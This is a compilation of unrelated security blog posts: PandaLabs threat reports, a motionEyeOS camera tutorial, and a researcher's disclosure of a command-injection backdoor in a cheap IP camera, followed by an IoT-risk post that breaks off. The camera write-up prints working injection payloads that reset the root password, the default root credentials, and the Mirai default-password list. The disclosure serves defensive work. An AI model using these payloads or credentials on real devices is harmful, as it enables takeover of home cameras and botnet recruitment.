Recent developments in robotics and AI have led to the belief that the fourth industrial revolution is not far off. Robotics and AI technology could do more than just take over jobs: virtual assistants like Google Home and Amazon Echo can become a dangerous inroad for hackers. Introduced in February 2017, Google Home can tune into your home IoT devices while waiting to be called on, making it the perfect device for eavesdropping. Police recently requested access to an Amazon Echo device as it may have held evidence that could be useful to their case.

Over the course of 2016, ransomware attacks earned criminals billions of rand. Fueled by its profitability, ransomware attacks continue to increase, with new variants created daily. In Q1 PandaLabs discovered the ransomware variant WYSEWYE, which allows the attacker to select and take control of specific folders on the victim’s endpoint, ultimately demanding a ransom to give back control to the victim.

      See the full report by PandaLabs here.

      The post The Rise and Rise of the Cyber Economy – PandaLabs Q1 2017 Report appeared first on CyberSafety.co.za.

      Cyber Security Predictions for 2017


      Analysis

      2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

      Throughout 2016, we’ve seen how the number of new malware has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however attacks have become more effective.

      Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect as many computers as possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

      If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.


      Ranking the top attacks of 2016



      Ransomware

      We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of the system tool PowerShell has risen this year; installed by default in Windows 10, it is frequently used in attacks to avoid detection by security solutions installed on victims’ computers.

In Q2 of 2016, one of the strangest cases of ransomware involved a company in Slovenia. The company’s head of security received an email out of Russia informing him that their network had been compromised and that the senders were poised to launch ransomware on all of its computers if the company didn’t pay around €9000 in bitcoins within 3 days. To prove that they did in fact have access to the organisation’s network, the hackers sent a file listing every device connected to the company’s internal network.

Ransomware as a Service (RaaS) was the latest development in the ransomware industry. In Q3 we witnessed a higher level of specialisation in the ransomware trade. The best example of this was the creators of the ransomware Petya and Mischa, who specialised in developing the malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part, the distributors take charge of infecting victims. Much as in the legal world, the distributors’ profit is a percentage of the money acquired: the higher the sales, the higher the percentage they receive.


      Malicious email

      Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.


      Business Email Compromise Phishing

      Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

      A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

      In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.



      Mobile Devices

SNAP is one of the most popular vulnerabilities we’ve seen this year, affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, Smart Notice, which allowed arbitrary JavaScript to run. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

      Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

In August, Apple published an urgent update, iOS 9.3.5. This version resolves three zero-day vulnerabilities used by the spyware known as Pegasus, developed by the NSO Group, an Israeli organization with products similar to those offered by Hacking Team.


      Internet of Things

      Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

Smart homes are just as vulnerable to attack: researchers Andrew Tierney and Ken Munro showed a proof of concept they built to hijack a thermostat. After taking control of the thermostat (by inserting an SD card into it), they raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, giving its MAC address as an identifier for each compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.



      Cyberwarfare

      2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

      In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year ago, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F15 fighter jet.

      At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

      On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites, and at least one of the attackers — identified as foreigners — was able to make off with voter registration data.

      In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


      Cybercrime

      In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

      In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

      One of the biggest attacks to date affected Yahoo – despite having taken place in 2014 the attack only become known recently. A total of 500 million accounts were compromised, becoming the greatest theft in history.

      In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.


      DDoS Attacks

In September, Brian Krebs, the famed journalist specialising in security, blew the cover off of vDOS, a “business” that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had led 150,000 attacks and made a profit of $618,000, were arrested.

      In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

      In the last quarter of the year, a wave of large-scale cyberattacks against the American internet provider DynDNS disrupted the service of some major global corporations’ websites. The brutal attack affected major organisations and international communications tools, such as Netflix, Twitter, Amazon, and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.



      POS’s and Credit Cards

      The popular American fast food chain Wendy’s saw the Points of Sale terminals at more than 1,000 of its establishments infected with malware that stole credit card information from its clients. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

      Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS’s had been infected with the malware PosCardStealer.


      Financial Institutions

      This year, the Central Bank of Bangladesh suffered an attack in which 1 billion US dollars in bank transfers were made. Fortunately, a large portion of those transfers were blocked, although the thieves had already succeeded in making off with 81 million dollars.

      Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.



      Social Networks

The security of 117 million LinkedIn users was at risk after a list of email addresses and their respective passwords was published.

On Twitter, 32 million usernames and passwords were put up for sale for around $6000. The social network denied that the account information had been acquired from their servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were obtained by means of phishing or Trojans.

      This year it came to light that MySpace was attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords, and email addresses were taken, reaching up to 360 million affected accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords, and aren’t using two-factor authentication they could be at risk.

      Activating two-factor authentication, creating complex passwords and not reusing them for different websites is recommended to avoid these risks.

      What cyber nightmares does 2017 have in store for us?


      Ransomware

      Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.

      Taking every idea into consideration


      Companies

      Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

      Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movements to access resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting with ransomware all available devices), in order to demand astronomical sums of money to recover the data of affected companies.


      Internet of Things

      Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security strength in mind. Typically they do not receive automatic security updates, use weak passwords, reuse the same credentials in thousands of devices, and other security flaws – all of this together makes them extremely vulnerable to outside attacks.


      DDoS

      The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after his having reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French company OVH (reaching 1Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

      These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.


      Mobile Phones

      The target is clear here as well — Android devices got the worst of it. Which makes sense, given that Android has the greatest market share. Focusing on one single OS makes it easier for cybercriminals to fix a target with maximal dissemination and profitability.

To complicate matters, updates do not depend only on Google releasing a new Android version, but also on each hardware manufacturer’s decision of when and how to incorporate them, if at all. Given the number of security issues that crop up every month, this situation only puts users at greater risk.


      Cyberwarfare

      We are living in uncertain times with regards to international relations – threats of commercial warfare, espionage, tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

Governments will want access to more information, at a time when encryption is becoming more popular, and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

      A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.

      The post Cyber Security Predictions for 2017 appeared first on CyberSafety.co.za.

      Toolsmith In-depth Analysis: motionEyeOS for Security Makers



It's rather hard to believe, unimaginable even, but here we are. This is the 120th consecutive edition of toolsmith; every month for the last ten years, I've been proud to bring you insights and analysis on free and open source security tools. I hope you've enjoyed the journey as much as I have; I've learned a ton and certainly hope you have too. If you want a journey through the past, October 2006 through August 2015 are available on my web site here, in PDF form, and many years' worth have been published here on the blog as well.
I labored a bit on what to write about for this 10th Anniversary Edition and settled on something I have yet to cover, a physical security topic. To that end I opted for a very slick maker project, using a Raspberry Pi 2, a USB web cam, and motionEyeOS. Per Calin Crisan, the project developer, motionEyeOS is a Linux distribution that turns a single-board computer into a video surveillance system. The OS is based on BuildRoot and uses motion as a backend and motionEye for the frontend.
      • Buildroot "is a simple, efficient and easy-to-use tool to generate embedded Linux systems through cross-compilation."
      • Motion (wait for it) is a program that monitors the video signal from cameras and is able to detect if a significant part of the picture has changed; in other words, it can detect motion.
• motionEye is also Calin's project and is a web frontend for the motion daemon.

      Installation was insanely easy, I followed Calin's installation guidelines and used Win32DiskImager to write the image to the SD card. Here's how straightforward it was in summary.
      1) Download the latest motionEyeOS image. I used build 20160828 for Raspberry Pi 2.
      2) Write the image to SD card, insert the SD into your Pi.
3) Plug a supported web camera into your Pi and power up the Pi. Give it a couple of minutes after first boot per the guidelines: do not disconnect or reboot your board during these first two minutes. The initialization steps:
      • prepare the data partition on the SD card
      • configure SSH remote access
      • auto-configure any detected camera devices
4) Determine the IP address assigned to the Pi; DHCP is the default. You can do this with a monitor plugged into the Pi's HDMI port, via your router's connected devices list, or with a network scan.
      For detailed installation instructions, refer to PiMyLifeUp's Build a Raspberry Pi Security Camera Network. It refers to a dated, differently named (motionPie) version of motionEyeOS, but provides great detail if you need it. There are a number of YouTube videos too, just search motionEyeOS.

      Configuration is also ridiculously simple. Point your browser to the IP address for the Pi, http://192.168.248.20 for me on my wired network, and http://192.168.248.64 once I configured motionEyeOS to use my WiFi dongle.
The first time you log in, the password is blank, so change that first. In the upper left corner of the UI you'll see a round icon with three lines; that's the settings menu. Click it and change your admin and user (viewer) passwords STAT. Then immediately enable Advanced Settings.
      Figure 1: Preferences

You'll definitely want to add a camera, and keep in mind that you can manage multiple cameras with one motionEyeOS device, and even multiple motionEyeOS systems with one master controller. Check out Usage Scenarios for more.
      Figure 2: Add a camera

      Once your camera is enabled, you'll see its feed in the UI. Note that there are unique URLs for snapshots, streaming and embedding.

      Figure 3: Active camera and URLs
      When motion detection has enabled the camera, the video frame in the UI will be wrapped in orange-red. You can also hover over the video frame for additional controls such as full screen and immediate access to stored video.

There is an absolute plethora of settings options, the most important of which, after camera configuration, is storage. You can write to local storage or a network share; this quickly matters if you choose an always-on scenario versus motion-enabled recording.
      Figure 4: Configure file storage
      You can configure text overlay, video streaming, still images, schedules, and more.
      Figure 5: Options, options, options
The most important variable of all is how you want to be notified.
There are configuration options that allow you to run commands, so you can script up a preferred process or use one already devised.
      Figure 6: Run a command for notification

Best of all, you can make use of a variety of notification services including email, as well as Pushover and IFTTT via Web Hooks.
      Figure 7: Web Hook notifications
      There is an outstanding article on using Pushover and IFTTT on Pi Supply's Maker Zone. It makes it easy to leverage such services even if you haven't done so before.
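As an added example, not from the toolsmith column or the motionEyeOS project, here is the kind of script the "run a command" option can invoke. It is assumed to be called with a camera id and a camera name as arguments; it debounces repeated motion events per camera through a small state directory (the /data path is an assumption), escapes the UI-supplied camera name so the JSON stays valid, and posts the payload to the web hook named in NOTIFY_URL. When no URL is configured it records the payload in a log instead, which is also how it can be exercised offline.

```shell
#!/bin/sh
# Added example (not motionEyeOS project code): a motion-event hook with
# per-camera rate limiting and a JSON web hook. Assumptions: invoked as
#   notify-hook.sh <camera_id> <camera_name>
# STATE_DIR must be writable; NOTIFY_URL is the Pushover/IFTTT/other endpoint.

STATE_DIR="${STATE_DIR:-/data/notify-state}"   # assumed writable path on the Pi
MIN_INTERVAL="${MIN_INTERVAL:-60}"              # seconds between alerts per camera

# Escape backslashes and quotes so a camera name typed into the UI cannot
# break the JSON body (or smuggle extra fields into it).
json_escape() {
    printf '%s' "$1" | sed 's/\\/\\\\/g; s/"/\\"/g'
}

# $1 = camera id, $2 = camera name, $3 = event time (epoch seconds)
build_payload() {
    printf '{"camera_id":"%s","camera":"%s","event":"motion","time":%s}' \
        "$(json_escape "$1")" "$(json_escape "$2")" "$3"
}

# Decide whether an event for camera $1 at time $2 should be sent.
# Returns 0 (send) and records the time, or 1 (suppressed: too soon).
should_notify() {
    # Camera ids are numbers in motionEye; sanitize anyway so the id can
    # never become a path component ("../") inside STATE_DIR.
    id=$(printf '%s' "$1" | tr -c 'A-Za-z0-9_-' '_')
    mkdir -p "$STATE_DIR"
    stamp="$STATE_DIR/last-$id"
    last=0
    if [ -f "$stamp" ]; then
        last=$(cat "$stamp")
    fi
    if [ $(( $2 - last )) -lt "$MIN_INTERVAL" ]; then
        return 1
    fi
    printf '%s\n' "$2" > "$stamp"
    return 0
}

# $1 = camera id, $2 = camera name, $3 = optional event time (defaults to now)
notify() {
    now="${3:-$(date +%s)}"
    if ! should_notify "$1" "$now"; then
        return 1
    fi
    body=$(build_payload "$1" "$2" "$now")
    if [ -n "${NOTIFY_URL:-}" ]; then
        curl -fsS -H 'Content-Type: application/json' -d "$body" "$NOTIFY_URL" >/dev/null
    else
        # No web hook configured: keep the payload for inspection.
        printf '%s\n' "$body" >> "$STATE_DIR/dry-run.log"
    fi
}

# When run by motionEyeOS, the arguments are the camera id and name.
if [ "$#" -ge 2 ]; then
    notify "$1" "$2"
fi
```

Point motionEyeOS at the script as the command to run when motion starts; the MIN_INTERVAL debounce keeps a single person walking through a room from producing a burst of identical pushes.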
The net result, after easy installation and a little bit of configuration, is your own motion-enabled CCTV system that costs very little compared to its commercial counterparts.
      Figure 8: Your author entering his office under the watchful eye of Camera1
      Purists will find image quality a bit lacking perhaps, but with the right camera you can use Fast Network Camera. Do be aware of the drawbacks though (lost functionality).

      In closing, I love this project. Kudos to Calin Crisan for this project. Makers and absolute beginners alike can easily create a great motion enabled video/still camera setup, or a network of managed cameras with always on video. The hardware is inexpensive and readily available. If you've not explored Raspberry Pi this is a great way to get started. If you're looking for a totally viable security video monitoring implementation, motionEyeOS and your favorite IoT hardware (the project supports other boards too) are a perfect combo. Remember too that there are Raspberry Pi board-specific camera modules available.

      Ping me via email or Twitter if you have questions (russ at holisticinfosec dot org or @holisticinfosec).
      Cheers…until next time.

      How I hacked my IP camera, and found this backdoor account

The time has come. I bought my second IoT device - in the form of a cheap IP camera. As it was the cheapest among all others, my expectations regarding security were low. But this camera was still able to surprise me.

Maybe I will disclose the camera model used in my hack in this blog later, but first I will try to contact someone regarding these issues. Unfortunately, it seems a lot of different cameras have this problem, because they were developed on the same SDK. Again, my expectations are low on this.

      The obvious problems



I opened the box, and I was greeted with a password of four numeric characters. This is the password for the "admin" user, which can configure the device, watch its output video, and so on. Most people don't care to change this anyway.

      It is obvious that this camera can talk via Ethernet cable or WiFi. Luckily it supports WPA2, but people can configure it for open unprotected WiFi of course. 

Sniffing the traffic between the camera and the desktop application, it is easy to see that it talks via HTTP on port 81. The session management is pure genius. The username and password are sent in every GET request. Via HTTP. Via hopefully not open WiFi. It comes in really handy in case you forgot it, but luckily the desktop app already saved the password for you in clear text in
      "C:\Users\<USER>\AppData\Local\VirtualStore\Program Files (x86)\<REDACTED>\list.dat"

      This nice camera communicates to the cloud via UDP. The destination servers are in Hong Kong and China. In case you wonder why an IP camera needs a cloud connection, it is simple. This IP camera has a mobile app for Android and iOS, and via the cloud the users don't have to bother to configure port forwards or dynamic DNS to access the camera. Nice.

      Let's run a quick nmap on this device.
      PORT     STATE SERVICE    VERSION
      23/tcp   open  telnet     BusyBox telnetd
      81/tcp   open  http       GoAhead-Webs httpd
      | http-auth: 
      | HTTP/1.1 401 Unauthorized
      |_  Digest algorithm=MD5 opaque=5ccc069c403ebaf9f0171e9517f40e41 qop=auth realm=GoAhead stale=FALSE nonce=99ff3efe612fa44cdc028c963765867b domain=:81
      |_http-methods: No Allow or Public header in OPTIONS response (status code 400)
      |_http-title: Document Error: Unauthorized
      8600/tcp open  tcpwrapped
      The already known HTTP server, a telnet server via BusyBox, and a port on 8600 (have not checked so far). The 27 page long online manual does not mention any Telnet port. How shall we name this port? A debug port? Or a backdoor port? We will see. I manually tried 3 passwords for the user root, but as those did not work, I moved on.

      The double blind command injection

The IP camera can upload photos to a configured FTP server on a scheduled basis. When I configured it, unfortunately it was not working at all: I got invalid username/password on the server. After some debugging, it turned out the problem was that I had a special $ character in the password. And this is where the real journey began. I was sure this was a command injection vulnerability, but not sure how to exploit it. There were multiple problems which made the exploitation harder. I call this vulnerability double blind command injection. The first blind comes from the fact that we cannot see the output of the command, and the second blind comes from the fact that the command was running in a different process than the webserver, thus any time-based injection involving sleeps was not a real solution.
But the third problem was the worst: the input was limited to 32 characters. I was able to leak some information via DNS; for example, with the following command I was able to see the current directory:
      $(ping%20-c%202%20%60pwd%60)
      or cleaned up after URL decode:
      $(ping -c 2 `pwd`)
      but whenever I tried to leak information from /etc/passwd, I failed. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. Fun times.

Following are some examples of my desperate attempts to get shell access. And this is the time to thank EQ for his help during the hacking session night, and for his great ideas.
      $(cp /etc/passwd /tmp/a)       ;copy /etc/passwd to a file which has a shorter name
      $(cat /tmp/a|head -1>/tmp/b)   ;filter for the first row
      $(cat</tmp/b|tr -d ' '>/tmp/c) ;filter out unwanted characters
      $(ping `cat /tmp/c`)           ;leak it via DNS
      After I finally hacked the camera, I saw the problem. There is no head, tr, less, more or cut on this device ... Neither netcat, bash ...

I also tried commix, as it looked promising on YouTube. Think of commix as sqlmap, but for command injection. But this double blind hack was a bit too much for this automated tool unfortunately.



      But after spending way too much time without progress, I finally found the password to Open Sesame.
      $(echo 'root:passwd'|chpasswd)
      Now, logging in via telnet
      (none) login: root
      Password:

      BusyBox v1.12.1 (2012-11-16 09:58:14 CST) built-in shell (ash)
      Enter 'help' for a list of built-in commands.
      #

      Woot woot :) I quickly noticed the root of the command injection problem:

      # cat /tmp/ftpupdate.sh
      /system/system/bin/ftp -n<<!
      open ftp.site.com 21
      user ftpuser $(echo 'root:passwd'|chpasswd)
      binary
      mkdir  PSD-111111-REDACT
      cd PSD-111111-REDACT
      lcd /tmp
      put 12.jpg 00_XX_XX_XX_XX_CA_PSD-111111-REDACT_0_20150926150327_2.jpg
      close
      bye

      Whenever a command is put into the FTP password field, it is copied verbatim into this script, and when the scheduled script runs, the shell interprets it: the heredoc delimiter (!) is unquoted, so the shell performs command substitution on the body before the text ever reaches the ftp client. After this I started to panic that I had forgotten to save the content of the /etc/passwd file: how was I going to crack the default telnet password? "Luckily", rebooting the camera restored the original password.

      root:LSiuY7pOmZG2s:0:0:Administrator:/:/bin/sh

      Unfortunately there is no need to start good-old John The Ripper for this task, as Google can tell you that this is the hash for the password 123456. It is a bit more secure than a luggage password.
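      The following is an added example, not code from the camera's firmware or from the original post. It rebuilds the shape of /tmp/ftpupdate.sh to show why a password containing $(...) ends up running as a command, and what changes when the heredoc delimiter is quoted. The FTP host is a constructed placeholder, "cat" stands in for /system/system/bin/ftp -n so the script prints what the ftp client would receive, and the demo password uses a harmless marker instead of the chpasswd payload.

```shell
#!/bin/sh
# Added example, not the camera's or the post's own code. Shows the
# unquoted-heredoc defect behind /tmp/ftpupdate.sh and two mitigations:
# a quoted delimiter and input validation. ftp.example.invalid is a
# constructed placeholder; "cat" stands in for /system/system/bin/ftp -n.

# Render the script the way the camera does: the password is pasted into
# the heredoc body and the delimiter (!) is UNQUOTED, so when the script
# runs, the shell performs $(...) and `...` substitution on the body.
build_script_unquoted() {
    printf 'cat <<!\nopen ftp.example.invalid 21\nuser %s %s\nbye\n!\n' "$1" "$2"
}

# Same script with a QUOTED delimiter ('!'): the shell hands the body to
# the FTP client byte for byte, and $(...) stays plain text in the password.
build_script_quoted() {
    printf "cat <<'!'\nopen ftp.example.invalid 21\nuser %s %s\nbye\n!\n" "$1" "$2"
}

# Run a generated script and return the "user" line the FTP client sees.
user_line_seen_by_ftp() {
    printf '%s\n' "$1" | sh | grep '^user '
}

# A quoted delimiter stops shell expansion but not FTP-level injection: a
# newline in the password would append FTP commands, and a line that is
# only "!" would terminate the heredoc early. Refuse whitespace and
# control characters before the password ever reaches the script.
password_is_safe() {
    case "$1" in
        *[[:space:][:cntrl:]]*) return 1 ;;
    esac
    return 0
}

# Constructed demo password: a harmless marker in place of the chpasswd
# payload from the post.
DEMO_PASSWORD='$(echo INJECTED)'
echo "unquoted delimiter: $(user_line_seen_by_ftp "$(build_script_unquoted ftpuser "$DEMO_PASSWORD")")"
echo "quoted delimiter:   $(user_line_seen_by_ftp "$(build_script_quoted ftpuser "$DEMO_PASSWORD")")"
```

      Running it prints "user ftpuser INJECTED" for the unquoted delimiter, i.e. the shell already executed the substitution, and the literal "user ftpuser $(echo INJECTED)" for the quoted one. Neither form is a substitute for rejecting whitespace and control characters, which is the only thing that keeps the password from breaking the FTP command stream itself.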

      It is time to recap what we have. There is an undocumented telnet port on the IP camera, which can be accessed by default with root:123456; there is no GUI to change this password, and a change made via the console only lasts until the next reboot. I think it is safe to call this a backdoor.
      With this console access we can read the passwords for the FTP server and the SMTP server (used for alerts), and the WiFi password (although we probably already have it), access the regular admin interface of the camera, or just modify the camera as we want. In most deployments, luckily, this telnet port is behind NAT or a firewall, so it is not accessible from the Internet. But there are always exceptions. Luckily, UPNP does not configure the telnet port to be open to the Internet, only the camera's HTTP port 81. You know, the one protected with a 4 character numeric password by default.

      Last but not least, everything is running as root, which is not surprising.

      My hardening list

      I added these lines to the end of /system/init/ipcam.sh:
      sleep 15
      echo 'root:CorrectHorseBatteryRedStaple'|chpasswd
      Also, if you want, you can disable the telnet service by commenting out telnetd in /system/init/ipcam.sh.

      If you want to disable the cloud connection (thus rendering the mobile apps unusable), put the following line at the beginning of /system/init/ipcam.sh:
      iptables -A OUTPUT -p udp ! --dport 53 -j DROP
      You can use OpenVPN to connect into your home network, and access the web interface of the camera. It works from Android, iOS, and any desktop OS.

      My TODO list

      • Investigate the script /system/system/bin/gmail_thread
      • Investigate the cloud protocol * - see update 2016 10 27
      • Buy a Raspberry Pi, integrate it with a good USB camera, and watch this IP camera burn
      A quick Google search revealed I am not the first to find this telnet backdoor account in IP cameras, although others found it via a JTAG firmware dump.

      And 99% of the people who buy these IP cameras think they will be safe with it. Now I understand the sticker which came with the IP camera.


      When in the next episode of Mr Robot you see someone logging into an IP camera via telnet with root:123456, you will know it is the sad reality.

      If you are interested in generic ways to protect your home against IoT, read my previous blog post on this. 

      Update: as you can see on the following screenshot, the bad guys have already started to take advantage of this issue ... https://www.incapsula.com/blog/cctv-ddos-botnet-back-yard.html

      Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. If your IoT device has a telnet port open (or SSH), scan it for these username/password pairs.

      root     xc3511
      root     vizxv
      root     admin
      admin    admin
      root     888888
      root     xmhdipc
      root     default
      root     juantech
      root     123456
      root     54321
      support  support
      root     (none)
      admin    password
      root     root
      root     12345
      user     user
      admin    (none)
      root     pass
      admin    admin1234
      root     1111
      admin    smcadmin
      admin    1111
      root     666666
      root     password
      root     1234
      root     klv123
      Administrator admin
      service  service
      supervisor supervisor
      guest    guest
      guest    12345
      guest    12345
      admin1   password
      administrator 1234
      666666   666666
      888888   888888
      ubnt     ubnt
      root     klv1234
      root     Zte521
      root     hi3518
      root     jvbzd
      root     anko
      root     zlxx.
      root     7ujMko0vizxv
      root     7ujMko0admin
      root     system
      root     ikwb
      root     dreambox
      root     user
      root     realtek
      root     00000000
      admin    1111111
      admin    1234
      admin    12345
      admin    54321
      admin    123456
      admin    7ujMko0admin
      admin    1234
      admin    pass
      admin    meinsm
      tech     tech
      mother   fucker

      Update 2016 10 27: As I have already mentioned at multiple conferences, the cloud protocol is a nightmare. It is clear-text, and even if you disabled port forwarding/UPNP on your router, the cloud protocol still allows anyone to connect to the camera, if the attacker knows the (brute-forceable) camera ID. Although this gives access to the user interface only, the attacker can then use the command injection to execute code with root privileges, or just grab the camera configuration, with the WiFi, FTP and SMTP passwords included.
      YouTube video: https://www.youtube.com/watch?v=18_zTjsngD8
      Slides (29 - ) https://www.slideshare.net/bz98/iot-security-is-a-nightmare-but-what-is-the-real-risk

      Update 2017-03-08: "Because of code reusing, the vulnerabilities are present in a huge list of cameras (especially the InfoLeak and the RCE), which allow to execute root commands against 1250+ camera models with a pre-auth vulnerability." https://pierrekim.github.io/advisories/2017-goahead-camera-0x00.txt

      Update 2017-05-11: CVE-2017-5674 (see above) and my command injection exploit were combined in the Persirai botnet. 120,000 cameras are expected to be infected soon. If you still have a camera like this at home, please consider the following recommendation by Amit Serper: "The only way to guarantee that an affected camera is safe from these exploits is to throw it out. Seriously."
      This issue might be worse than the Mirai worm, because it affects cameras and other IoT devices behind NAT where UPNP was enabled.
      http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/


      How to secure your home against "Internet of Things" and FUD

      TL;DR: most of the security news about IoT is full of FUD. Always put the risks in context: who can exploit this, and what can the attacker do with it? Most news only covers the latter.

      Introduction

      There is rarely a day without news that another "Internet of Things" device got hacked. "Smart" safes, "smart" rifles, "smart" cars, "smart" fridges, "smart" TVs, "smart" alarm systems, "smart" meters, "smart" bulbs, NAS devices, routers. These devices are getting hacked every day. Because most of these devices were never designed with security as a goal, and some of them have never been tested by security professionals, it is no surprise that these things are full of vulnerabilities.

      Independent security researchers find these vulnerabilities, write a cool blog post or give a presentation about the vulnerability and the exploit, and the media forgets the constraints just for the sake of more clicks. "We are all doomed", we read in the news, but sometimes the risks are buried deep in technical jargon. Please note I blame the news sites here, not the researchers.

      http://www.slideshare.net/danielmiessler/iot-attack-surfaces-defcon-2015

      There are huge differences between the following risks:

      • Attackers can directly communicate with the router (or camera) from the Internet without authentication and exploit the vulnerability. This is the worst case scenario. For example, an automated ransomware attack against your NAS is pretty bad.
      • Attackers have to position themselves in the same WAN network (e.g. the Sprint mobile network in the case of the Jeep hack) to exploit the vulnerability. This is still pretty bad.
      • The vulnerable code cannot be triggered directly from the Internet, but tricks like CSRF can be used to exploit it (details later in this post).
      • The vulnerable code cannot be triggered directly from the Internet, and it uses a protocol/port which prevents Cross Protocol Scripting. Attackers have to access the local network before exploiting this vulnerability.
      As for the worst-case scenario, one can find a lot of such devices connected directly to the Internet. You can always find funny stuff at http://explorer.shodanhq.com/#/explore , or use the nmap screenshot script to find your own stuff :)


      Network exposure

